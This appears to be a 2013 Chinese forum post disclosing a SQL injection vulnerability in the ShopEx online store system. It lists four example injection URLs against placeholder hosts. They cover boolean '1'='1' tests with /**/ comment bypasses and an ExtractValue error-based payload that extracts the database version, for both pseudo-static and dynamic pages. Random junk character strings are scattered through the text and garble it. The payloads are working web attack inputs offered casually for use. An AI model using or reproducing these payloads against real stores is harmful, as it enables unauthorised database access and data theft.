注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
- j, M5 E& A$ d2 n- L$ H$ N4 j& d" A8 t6 h7 A, _' Q" {# f
好吧,我扯远了~~/ q2 D& _1 P! t
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
+ l+ }1 e) |$ u% d' g$ q! f; b不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
2 g! j2 I- J7 q6 j2 F" Y& j3 m9 E4 D% F+ p2 a! c9 A( q
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
( b5 ?5 |3 e, @
" ]/ D" @$ ]6 N* l' s5 ihttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
; F; u- s( [, Z( ^) Q" Q, @
5 f; W; Z6 |! A3 \( rhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
( E6 g" T7 ]8 U3 [1 S# F$ C( f5 J. u1 `6 q4 j
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html 1 j h6 m$ I6 L; X
% h# H, g; @- L% Y8 c2 [ T
' V! p% M# k- I
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。6 H& F; [+ a: M. ^4 `# s# R3 A
如何注入就不多说了,10多年的东西了…不会也会了…
[; u. z1 }6 h1 S3 N( \% I3 Q6 u6 _3 n
3 o- A* m% A( ~ E4 {. p' ~/ \' T& h! O9 V/ i
) o% i% {5 C3 G% a2 y
|
发表于 2013-2-19 08:31:27
收藏
支持
反对